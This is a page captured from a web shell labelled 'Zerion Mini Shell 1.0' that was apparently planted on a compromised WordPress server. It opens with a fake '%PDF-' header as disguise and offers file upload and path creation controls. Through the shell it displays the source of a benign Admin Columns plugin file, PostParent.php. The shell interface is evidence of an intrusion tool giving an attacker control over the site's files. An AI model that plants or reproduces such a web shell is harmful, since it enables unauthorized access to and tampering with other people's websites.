%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/cwg/wp-content/plugins/codepress-admin-columns/classes/Column/Post/
Upload File :
Create Path :
Current File : //var/www/cwg/wp-content/plugins/codepress-admin-columns/classes/Column/Post/PostParent.php

<?php

namespace AC\Column\Post;

use AC\Column;

/**
 * @since 2.0
 */
class PostParent extends Column {

	public function __construct() {
		$this->set_type( 'column-parent' );
		$this->set_label( __( 'Parent', 'codepress-admin-columns' ) );
	}

	public function get_value( $post_id ) {
		$parent_id = $this->get_raw_value( $post_id );

		if ( ! $parent_id ) {
			return $this->get_empty_char();
		}

		return ac_helper()->html->link( get_edit_post_link( $parent_id ), ac_helper()->post->get_raw_field( 'post_title', $parent_id ) );
	}

	public function get_raw_value( $post_id ) {
		$parent_id = ac_helper()->post->get_raw_field( 'post_parent', $post_id );

		return $parent_id && is_numeric( $parent_id ) ? (int) $parent_id : false;
	}

	public function is_valid() {
		return is_post_type_hierarchical( $this->get_post_type() );
	}

}

Zerion Mini Shell 1.0